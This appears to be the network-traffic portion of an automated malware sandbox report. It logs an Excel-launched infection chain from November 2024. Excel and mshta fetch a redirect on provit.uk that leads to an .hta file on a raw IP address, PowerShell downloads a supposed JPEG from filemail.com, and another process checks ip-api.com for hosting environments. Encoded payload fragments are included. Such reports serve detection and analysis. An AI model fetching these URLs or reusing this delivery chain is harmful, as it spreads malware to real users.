AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIDMAAAAMAwAQDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 20, 2024 07:50:32.630245924 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 6f 51 44 2b 6b 48 62 69 31 57 5a 7a 4e 58 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoQD+kHbi1WZzNXYvwjCN4zbm5WS0NXdyR3L8ACIK0gP5RXayV3YlN3L8ACIgAiCN4zcldWZslmdpJHUkVGdzVWdxVmcvwDIgACIgAiCN4zLiU2csFmZi0zczV2YjFUa1BiIyV2avZnbJNXYi0DblZXZsBCblZXZM52bpRXdjVGeFRWZ
Nov 20, 2024 07:50:32.630250931 CET	1236	IN	Data Raw: 42 51 59 41 49 48 41 55 42 41 62 41 45 47 41 6e 42 51 5a 41 77 45 41 42 41 77 47 41 41 47 41 41 41 41 41 41 34 43 41 6b 42 51 5a 41 59 48 41 79 42 51 5a 41 4d 48 41 6c 42 67 63 41 41 43 41 7a 42 41 64 41 67 47 41 6e 42 51 61 41 49 48 41 67 41 41 Data Ascii: BQYAIHAUBAbAEGAnBQZAwEABAwGAAGAAAAAA4CAkBQZAYHAyBQZAMHAlBgcAACAzBAdAgGAnBQaAIHAgAAbAwGABBAIA4CAuBwbAkGA0BQYAQGAuBQdA8GAGBAIAUGAyBQYAcHA0BgZA8GATBAIA4GAvBAaAQHA5BAUAACApAwYAgCAgAAdAgGAnBQaAIHA5BAcA8GADBAAAQHAoBwZAkGAyBQeAAHAvBwQAwGAhBwZAUGAMBQA
Nov 20, 2024 07:50:32.630256891 CET	1236	IN	Data Raw: 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: IAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 20, 2024 07:50:32.630261898 CET	1236	IN	Data Raw: 63 51 43 68 45 68 41 42 41 53 42 63 77 68 44 4f 4d 41 41 47 67 51 49 52 51 65 67 53 6b 51 42 64 6b 51 43 67 48 6f 45 49 63 41 45 49 67 51 48 53 4d 77 42 47 67 51 49 52 51 65 67 53 67 51 42 64 67 67 42 48 77 41 43 64 49 68 41 48 55 41 43 52 4a 52 Data Ascii: cQChEhABASBcwhDOMAAGgQIRQegSkQBdkQCgHoEIcAEIgQHSMwBGgQIRQegSgQBdggBHwACdIhAHUACRJRLDKxAHgACIUQHBMAIHgQUSUQHtMoEEcgCVMoEBCoERJRADAyCFMYEpMYEpMYEBMAIMUygSkxgSEAAIExgSYABIgQACASBdMYEAASBhMoEAAQBKExgSEgAgcQDDKRHAAiBFCoEAAQBI0xgR0xgR0xgR0xgRkhEZIRG
Nov 20, 2024 07:50:32.630283117 CET	1236	IN	Data Raw: 30 42 47 49 55 51 48 48 63 51 44 49 55 51 48 4a 67 42 42 48 63 41 47 42 45 41 41 45 67 51 43 49 55 51 48 6b 47 59 45 46 30 42 47 59 67 52 43 48 38 41 43 49 67 51 42 64 55 51 48 46 30 68 42 48 73 41 43 49 67 41 43 49 55 51 48 47 63 51 43 49 45 67 Data Ascii: 0BGIUQHHcQDIUQHJgBBHcAGBEAAEgQCIUQHkGYEF0BGYgRCH8ACIgQBdUQHF0hBHsACIgACIUQHGcQCIEgCDgACIgQBdUwBIgQBd0igSUQHtIoEFcQDI4QLCKRBd0igSUwBMggDtIoEF0RLCKRBd4wBH8ACtIoEpHoEF0RLCKRTCKRMCKRBdgwBWwhABACBAGoEBkPgRUBCc4QHSIAIGgAgBKRA5DYEVgQBdgQBdgQBdwXgRAYg
Nov 20, 2024 07:50:32.630290985 CET	776	IN	Data Raw: 55 51 48 46 30 52 42 64 55 51 48 46 30 52 42 64 55 51 48 49 55 51 48 46 30 52 42 64 77 77 42 59 67 41 43 4f 30 68 44 42 30 6b 45 56 34 67 44 42 30 6b 45 56 59 77 42 52 67 51 42 64 34 67 44 46 30 52 42 64 77 59 67 53 55 51 48 46 30 52 43 48 49 68 Data Ascii: UQHF0RBdUQHF0RBdUQHIUQHF0RBdwwBYgACO0hDB0kEV4gDB0kEVYwBRgQBd4gDF0RBdwYgSUQHF0RCHIhD9HoEBAiB5JYEOEgAgcAC5JRECKRBdUQHFHoE9HoEF0hDJcQFIggDdAUgSUQHI4gDOgVgS4AQBKRANJRFOEQTSURDH8BCI4QHI4QHI4QHO0RrBKROCKhDtGoE5IoEO4QHO0hDO4QANJRFO0hDVcgKIknERIoE5JRE
Nov 20, 2024 07:50:32.630296946 CET	1236	IN	Data Raw: 45 57 45 56 77 51 41 54 41 77 45 43 45 57 45 56 41 41 49 4b 77 51 67 53 45 51 54 53 55 68 44 43 30 6d 67 52 55 52 44 42 4d 42 41 54 49 51 62 43 47 52 46 41 41 79 43 4d 45 6f 45 42 30 6b 45 56 34 67 41 64 4a 52 46 4d 77 51 67 53 45 51 54 53 55 68 Data Ascii: EWEVwQATAwECEWEVAAIKwQgSEQTSUhDC0mgRURDBMBATIQbCGRFAAyCMEoEB0kEV4gAdJRFMwQgSEQTSUhDC0lEVEgCOgADBKRA5DYEVwQgSEQTSUhDC0mgRUBQBKRANJRFMEoEMEoEB0kEV4gAhFRFMEoEB0kEV4gAdJRFMFoEOUQHO4AQBKRANJRFNcQSIUQHIgQBdgQBgoACpJoEpHoElJoEIUQHF0RBdgwBTIwEAACBO4gD
Nov 20, 2024 07:50:32.630301952 CET	1236	IN	Data Raw: 63 41 45 49 4d 51 48 44 30 78 41 64 4d 51 48 49 34 51 48 41 46 6f 45 4f 30 68 44 4f 34 67 44 64 34 67 44 64 67 67 44 64 34 41 51 42 4b 52 41 4e 4a 52 46 54 63 67 4a 49 67 67 44 64 67 67 44 64 41 55 67 53 34 67 44 64 34 67 44 64 34 41 51 42 4b 52 Data Ascii: cAEIMQHD0xAdMQHI4QHAFoEO0hDO4gDd4gDdggDd4AQBKRANJRFTcgJIggDdggDdAUgS4gDd4gDd4AQBKRANJRFMcgGIggDdggDd4QHO4gDO4gDO0hDO0BQBKRANJRFQcQHI4QLCKhDF0R6BKRLCKRBd4QCHMBCOggAAUACOggDOggDO4QCHsgDOIQ2BGRFH4gDCUdgSUxBIMQHD0xAdMQHO4gAZHYEV4gDC0lEV4gAZHYEV4gD
Nov 20, 2024 07:50:32.630306959 CET	1236	IN	Data Raw: 67 67 44 64 4d 51 48 4f 34 51 48 4f 41 56 67 53 34 41 51 42 4b 52 41 4e 4a 52 46 4b 63 77 46 63 77 68 44 43 41 51 42 49 4d 51 41 67 51 41 43 49 55 51 48 46 67 67 44 4f 63 77 42 4b 67 77 41 64 4d 51 48 49 34 51 48 46 30 68 44 4f 41 55 67 53 34 51 Data Ascii: ggDdMQHO4QHOAVgS4AQBKRANJRFKcwFcwhDCAQBIMQAgQACIUQHFggDOcwBKgwAdMQHI4QHF0hDOAUgS4QHOswBUgAQBKBQBKRANJRFDcQDIAwEBASBAGoEB0kEVcQACGhDd4QHCASCO4Q/BKhAAcACO0BCO0BQBKRANJRFAFoEOUQHF0BgBKBeBKhDO4QHIUQHI4gDO4QHAFoEB0kEVYxBxUQHOEgAgYAC1HoECcgBIgQBdUQH
Nov 20, 2024 07:50:32.635400057 CET	1236	IN	Data Raw: 55 52 67 53 77 52 46 42 4b 42 47 59 55 52 67 53 67 52 46 42 4b 52 49 52 55 52 67 53 67 42 48 49 67 42 47 49 67 52 49 52 77 42 43 4f 45 53 45 43 30 6c 45 56 67 42 43 59 67 51 57 53 67 41 43 46 47 6f 45 41 46 6f 45 42 30 6b 45 56 63 79 42 53 42 77 Data Ascii: URgSwRFBKBGYURgSgRFBKRIRURgSgBHIgBGIgRIRwBCOESEC0lEVgBCYgQWSgACFGoEAFoEB0kEVcyBSBwEBEYgSURABAiCIFoEBkPgRUBCIFoEB0kEVcACIFoEBkPgRUBSBKBQBKRANJRFEcQFIwTgSIwBGgACCcAB9FoEBEAIGwmEBoABIwmEsJBbSQwBJgAHC4ABHYACJEAAEgACBAABI4AGIgAGCUQHdIRCH0ACdIBCDcgB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49168	208.95.112.1	80	2228	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 07:50:33.650850058 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Nov 20, 2024 07:50:34.125209093 CET	175	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 06:50:34 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false
Nov 20, 2024 07:50:34.334578037 CET	175	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 06:50:34 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	198.244.140.41	443	3216	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
2024-11-20 06:49:57 UTC	388	OUT	GET /wUE3Zl?&temple=standing&steps=overwrought&official=hushed&pressurisation HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: provit.uk Connection: Keep-Alive
2024-11-20 06:49:57 UTC	451	IN	HTTP/1.1 302 Found Content-Length: 103 Content-Type: text/plain; charset=utf-8 Date: Wed, 20 Nov 2024 06:49:57 GMT Location: http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.hta Strict-Transport-Security: max-age=15552000; includeSubDomains Vary: Accept X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 0 Connection: close
2024-11-20 06:49:57 UTC	103	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 2e 31 33 2f 33 35 32 2f 73 65 65 74 68 65 62 65 73 74 74 68 69 6e 67 73 77 69 74 68 67 72 65 61 74 73 69 74 75 61 74 69 6f 6e 73 68 61 6e 64 6c 65 74 6f 74 68 65 70 72 6f 67 72 65 73 73 2e 68 74 61 Data Ascii: Found. Redirecting to http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.hta

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49163	198.244.140.41	443	3540	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 06:50:00 UTC	412	OUT	GET /wUE3Zl?&temple=standing&steps=overwrought&official=hushed&pressurisation HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: provit.uk Connection: Keep-Alive
2024-11-20 06:50:00 UTC	451	IN	HTTP/1.1 302 Found Content-Length: 103 Content-Type: text/plain; charset=utf-8 Date: Wed, 20 Nov 2024 06:50:00 GMT Location: http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.hta Strict-Transport-Security: max-age=15552000; includeSubDomains Vary: Accept X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Xss-Protection: 0 Connection: close
2024-11-20 06:50:00 UTC	103	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 2e 31 33 2f 33 35 32 2f 73 65 65 74 68 65 62 65 73 74 74 68 69 6e 67 73 77 69 74 68 67 72 65 61 74 73 69 74 75 61 74 69 6f 6e 73 68 61 6e 64 6c 65 74 6f 74 68 65 70 72 6f 67 72 65 73 73 2e 68 74 61 Data Ascii: Found. Redirecting to http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.hta

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49166	142.215.209.78	443	2964	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 06:50:16 UTC	192	OUT	GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1 Host: 1017.filemail.com Connection: Keep-Alive
2024-11-20 06:50:16 UTC	324	IN	HTTP/1.1 200 OK Content-Length: 2230233 Content-Type: image/jpeg Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT Accept-Ranges: bytes ETag: 4bb5a8185f3b16880e3dcc573015c5d9 X-Transfer-ID: wxhdiueivoluihj Content-Disposition: attachment; filename=new_imagem.jpg Date: Wed, 20 Nov 2024 06:50:16 GMT Connection: close
2024-11-20 06:50:16 UTC	3719	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-11-20 06:50:16 UTC	8192	IN	Data Raw: 61 7e f8 15 fb 43 e2 b1 21 8f 43 e1 e4 33 83 40 a9 fc 38 be 83 ec b3 eb 60 6d 46 b6 66 59 18 fa 6b 9e 30 3f 67 bc 14 cd 33 4f a8 57 0c 87 81 ef f5 cf 61 0b 34 76 ad f8 41 ae 7b 60 29 e1 9e 14 9e 1b 03 44 8a 18 5e e0 cd d7 09 2a bb a5 d9 b5 27 d2 38 c7 84 88 c6 b7 ad fb 5e 55 d5 5d 48 2c 0f 5e 9c 60 26 fb 21 8a e4 53 67 8e 05 f5 18 ab 6b dd 26 69 4e a0 96 54 09 1a aa ed 53 c5 10 c0 e2 da e5 95 d9 96 33 b8 df 42 dc 0c ce 7d 3c c8 68 ee e3 93 5c 8c 0d 57 f0 ed 06 b3 42 16 48 4f de 1d bd 2a 83 75 12 78 1f 0e 2f 32 75 3f 66 5d 21 96 3d 2b ca ce 42 ee 5e 36 92 3a 83 df 8c 14 52 48 cd b0 3b 2b 86 e7 92 3f eb 8f e9 75 7a ed 38 2f 16 a1 57 aa 32 df 26 cf 4a 3c fd 70 32 bc 0e 0d 6e 8b c4 c3 b0 29 1c 7f f7 a3 77 55 cf af e9 7c 5a 49 f4 4a 16 25 68 f6 8d b2 15 14 bc Data Ascii: a~C!C3@8`mFfYk0?g3OWa4vA{`)D^'8^U]H,^`&!Sgk&iNTS3B}<h\WBHOux/2u?f]!=+B^6:RH;+?uz8/W2&J<p2n)wU\|ZIJ%h
2024-11-20 06:50:16 UTC	8192	IN	Data Raw: 48 c4 86 f7 3f 03 81 84 fa 49 e0 da e5 1a 3f 55 2f 3b 49 3e f9 b5 a5 d6 c3 06 88 41 24 c2 47 73 6c 0f aa 99 b2 de 37 36 f8 da 3f 21 88 46 07 7b 70 07 1d b1 0d 36 9d e2 58 b5 60 09 42 9f 52 8e 28 9e 07 ea 46 07 a9 56 b6 26 89 2b ec 78 e9 ed 92 5d 89 a2 68 66 46 97 c4 65 9b c4 8c 52 a8 89 69 86 c1 ef c7 5b 19 a3 a9 79 34 f0 86 8e 31 2b dd 6d 26 80 c0 30 00 59 20 57 b9 ca a9 de b6 18 b0 3d 3d b3 1d bc 4e 78 3c 18 cf 20 06 49 5b 6c 6b 5c 02 6e b9 f6 eb 87 9f 4d e2 6d 0f 99 0e b8 34 86 ed 55 56 af b8 07 03 40 09 37 72 48 f6 ac 29 91 c8 0c c0 0a 1c 57 7f 9e 23 e1 52 6a df 4b bf 56 de b2 68 02 a0 1f 6e d8 fb 80 c4 03 db 03 cc 78 9c 1a d8 b5 5a a7 d3 24 a2 19 54 bc ad b8 10 7d 26 f3 36 46 68 51 95 26 32 2b 9a 65 45 71 c0 e9 76 a0 7f 3c f5 fa d8 47 fb 2b 5a 47 4f Data Ascii: H?I?U/;I>A$Gsl76?!F{p6X`BR(FV&+x]hfFeRi[y41+m&0Y W==Nx< I[lk\nMm4UV@7rH)W#RjKVhnxZ$T}&6FhQ&2+eEqv<G+ZGO
2024-11-20 06:50:16 UTC	8192	IN	Data Raw: ed 2f 88 88 f6 45 ab 52 07 3b 55 10 1f 95 01 81 8f 16 87 4d 0e 94 ba a1 27 f8 49 6c 1c ba 57 8f 4c b2 06 50 4f 6a e7 3d 07 88 ec f1 7d 17 df e2 4f 2a 64 94 2e a1 11 4e d2 08 f4 b5 d7 16 45 57 be 63 ea 9b 73 04 e4 8a ae 2b fa e0 66 3a ee 86 c1 b3 d0 8c 17 dd 9b 63 28 16 18 5d 7b 67 a9 7d 3f d9 b5 50 ac be 2a 03 73 e9 f2 c5 f0 3a 58 ca eb 7c 13 4e da 13 af f0 2d 44 ba 88 a2 03 ef 10 cd ff 00 7b 15 8f c5 b6 85 8f 88 f6 3e c7 03 c9 26 9b ca 05 49 e0 0b bf 7c e9 62 67 88 5a 31 65 1c 10 3b 7b 66 ab 03 e4 aa 3a 2f 99 7d 72 8f a5 6d cc 19 d3 72 ae e2 09 23 8e bf 5c 0c 54 0c d1 0d d6 1b bd f7 c9 88 38 9c 39 27 6a 8e 95 9a 6f a0 91 e6 55 52 80 32 ee 00 df 35 ce 28 90 32 44 fa 80 c9 4a 69 97 75 92 a7 8f a6 04 8d 42 ba b8 60 19 4b 28 04 76 eb 83 25 ba a1 dc 2f 82 07 Data Ascii: /ER;UM'IlWLPOj=}Od.NEWcs+f:c(]{g}?Ps:X\|N-D{>&I\|bgZ1e;{f:/}rmr#\T89'joUR25(2DJiuB`K(v%/
2024-11-20 06:50:16 UTC	8192	IN	Data Raw: 96 61 55 f1 aa fa e7 2f 87 b4 70 69 75 b3 34 91 c8 8b 18 64 07 f0 f6 3f 21 57 66 f8 17 81 82 fa 79 74 f2 98 a5 55 dc bd 76 90 6b f2 ca 58 36 05 9f 7a c6 fe d5 7f d8 b5 71 49 a6 78 ff 00 7a a4 3a b2 d5 95 24 5f f6 f7 eb 98 71 78 ac 61 4d a3 2b 8f c4 07 f4 c0 da 5f 0c d6 16 8c 08 f6 87 1b 95 98 8a ae dd 31 f3 f6 69 59 43 99 cf 99 7d 42 8d a3 df 83 d7 07 e1 da 77 d4 e9 5f 53 2e 9d 67 59 11 4a 9d f7 b4 57 37 ec 40 24 fd 31 99 3c 5f 4f e0 9a 78 e0 d6 c8 5b 50 88 14 a2 7a 88 eb cb 0f e1 1d 39 c0 4a 7f 08 5d 1b 34 93 ce 86 28 dc 29 00 10 5b 8b ae 7d fe 18 b6 9b c3 9f 5e 9a 9d 4a 6d 8b 4e 84 aa 96 70 3e 9c 8e 78 cb 45 a5 d7 f8 ba ae a4 c2 eb 1a 90 11 59 7c bd ca 6c fa 41 e4 8f 8e 69 3f 86 cc 9e 01 26 95 c8 89 49 67 17 27 e1 02 8e da ae 7a 60 79 ef 1d d0 68 b4 40 Data Ascii: aU/piu4d?!WfytUvkX6zqIxz:$_qxaM+_1iYC}Bw_S.gYJW7@$1<_Ox[Pz9J]4()[}^JmNp>xEY\|lAi?&Ig'z`yh@
2024-11-20 06:50:16 UTC	8192	IN	Data Raw: 43 0b 61 59 98 da 15 15 fb c0 38 e6 f1 8d 26 91 11 8b b3 9a fe 1f 63 80 74 64 91 37 2a 31 53 d8 e2 ba c6 52 9b 08 b6 3d 3d 58 cc 69 be 06 f2 de 81 04 0f cf 11 8b 46 fe 6d 93 5b 79 2d ef 81 a5 f6 71 1a 1f 1f d1 2c 8b e9 3b bf f2 b6 7b 0d 7a c2 61 91 19 f6 a1 16 c5 78 bc f2 fe 19 a9 8e 0f 12 86 66 f5 05 0c 47 d5 48 fe b8 ef 89 78 82 6a 0e c8 d7 68 61 ef d7 03 2e 17 d6 24 ad 1e 92 56 10 5d ed eb 79 bb a4 90 e9 e0 65 d4 10 c4 7a ac 62 30 4f a7 d2 45 60 1d c4 75 cb 9d 6c 5a 85 01 68 0e 87 8e 4e 06 79 95 df ed 67 9d 1a f4 e0 9f f8 30 7e 2d 3b 3e aa 75 2d 41 a0 5b 00 5d d3 dd 65 d6 45 4f b5 22 98 14 ab 3f f2 11 fd 71 7f 16 dc 75 92 b0 1b 6e 1b 00 71 63 76 06 87 8c 05 fb 94 70 84 11 c4 b2 52 92 a7 9f 4b 61 b4 33 28 f0 b8 5a 45 5a 54 5a bf 82 8c 17 8b cb 14 9a 2d Data Ascii: CaY8&ctd7*1SR==XiFm[y-q,;{zaxfGHxjha.$V]yezb0OE`ulZhNyg0~-;>u-A[]eEO"?qunqcvpRKa3(ZEZTZ-
2024-11-20 06:50:16 UTC	8192	IN	Data Raw: 19 af a4 d1 ea 16 49 b5 12 6a 44 ac c4 b8 8c 9b 51 c9 ae 48 be d8 07 99 03 c5 2c 2c 68 32 b2 80 bd 79 07 90 6b ae 79 33 1c 53 b2 c8 4c 8a 1b cc de 18 ee 62 55 77 11 74 3a dd 7d 33 77 53 17 8c 3c 12 39 9b 4c bb 48 65 11 b1 05 76 8e 40 f4 f5 26 b3 cb 34 f3 12 0b 3b 5a b9 63 b8 72 59 b8 63 fa 60 13 50 90 23 40 c8 1f 64 8b b8 ef a1 43 73 0a e9 f0 c7 a0 4d 34 9a a8 24 57 68 43 cc c5 d8 90 ca 08 a2 a0 71 fe 6a cc b9 67 69 84 4b 56 51 4a dd f5 f5 16 fc b9 c3 27 88 49 1e 96 18 10 22 94 76 70 db 41 3c 80 39 e3 e1 81 ec 25 89 51 88 25 9a c5 9e 7e 3f 0e d8 34 28 cf b1 08 06 ae 8e 60 cf a4 f1 2d 44 c7 51 26 a2 17 62 80 1e eb 5e d5 55 91 1e 87 5e ae 5a 3d 6c 6a d5 43 6c 8c bc 7c 28 60 7a 38 f4 a1 98 ab 50 e0 ff 00 2c 34 2a 11 42 ec b2 78 bc f3 32 41 e2 ea ca 0e b9 89 Data Ascii: IjDQH,,h2yky3SLbUwt:}3wS<9LHev@&4;ZcrYc`P#@dCsM4$WhCqjgiKVQJ'I"vpA<9%Q%~?4(`-DQ&b^U^Z=ljCl\|(`z8P,4*Bx2A
2024-11-20 06:50:16 UTC	8192	IN	Data Raw: 54 55 fa 81 37 96 d4 eb 24 fb c1 78 55 49 3a 76 91 9a 39 03 2e d1 63 93 b6 cf 4f 7c 1a 78 8c 8e 93 07 11 b4 b6 82 30 a4 21 90 30 a0 28 f7 e9 80 6f 1b d4 79 30 ed 54 57 f3 55 94 d8 ed 5d 6e fd f3 e7 9e 35 2b a0 11 59 a2 4f 4e fd 33 e8 5e 27 a6 33 69 c1 44 11 88 a3 67 63 cd 80 aa 68 7b 77 39 f3 8f 15 7f 32 73 62 88 ed f9 60 0f 4b aa 68 b4 b2 69 e4 41 24 4e 37 15 2c 46 d3 c1 bb 1f 2c e8 f5 12 69 22 91 12 32 93 b7 57 37 61 6a f8 07 a6 2a 80 b1 f5 38 8f 8e 2e e8 fe 58 de aa 36 32 09 02 12 bb 23 1b d8 1a bd 8b c7 23 01 ad 0e bd 34 7a 59 10 ab 19 0b 31 0e 2a 88 2b 54 7b f5 e7 15 82 59 20 25 e3 62 ac c2 8d 7b 5d e5 5f 4d 22 2a 99 11 95 5b d4 a4 ad 6e cb 32 88 c2 72 ad b8 5d 2f ce bf a6 01 d2 67 5d 5c 33 4c ec fb 1d 5b fe 10 7a 64 eb e6 4d 56 aa 49 93 76 d6 0a 40 Data Ascii: TU7$xUI:v9.cO\|x0!0(oy0TWU]n5+YON3^'3iDgch{w92sb`KhiA$N7,F,i"2W7aj8.X62##4zY1+T{Y %b{]_M"*[n2r]/g]\3L[zdMVIv@
2024-11-20 06:50:16 UTC	8192	IN	Data Raw: 8a 28 34 df 1a c0 45 e1 b7 02 c9 07 b9 c3 1f 0f 55 50 c5 e8 9e 98 63 a6 90 96 21 49 0b f8 98 0e 07 d7 2a 60 63 c9 fa 60 5f c3 34 4c 35 8a e4 f0 2f 68 f7 e0 e6 d1 de aa ca 52 ef a1 f6 c5 bc 31 37 6b 34 b6 3f c4 2f fe 1c df 68 d2 e8 d1 c0 c5 8b 4e d4 c5 c5 83 db 10 13 3b 4e ea 84 2a a9 f6 eb 9e 8d c0 5b 00 0e 73 3d b4 a9 6c c1 28 9e b8 1e 76 75 0d e2 e5 b6 02 09 5a 07 e4 32 ba dd 2e c9 03 06 e5 95 8f ab b5 01 8e 6a 60 d9 e2 d4 05 fe 1f e4 32 de 21 18 06 2d e2 ed 5a 8f c6 b8 c0 46 70 cd e1 f1 a2 90 17 68 35 c7 aa ab af e7 8c 78 06 9d 5d e5 76 65 34 bb 76 b7 43 95 78 83 78 7b 12 a3 d2 c0 29 06 b9 a5 07 fa e1 7c 28 c3 19 65 76 2b 29 61 b6 81 37 7c 7f 5c 04 bc 41 25 87 5d 16 f4 8c 32 a8 2a b1 72 28 31 f7 cd 3d 64 03 69 76 92 71 bb d3 b4 30 0a 38 ef c6 27 e2 ab Data Ascii: (4EUPc!I`c`_4L5/hR17k4?/hN;N[s=l(vuZ2.j`2!-ZFph5x]ve4vCxx{)\|(ev+)a7\|\A%]2*r(1=divq08'
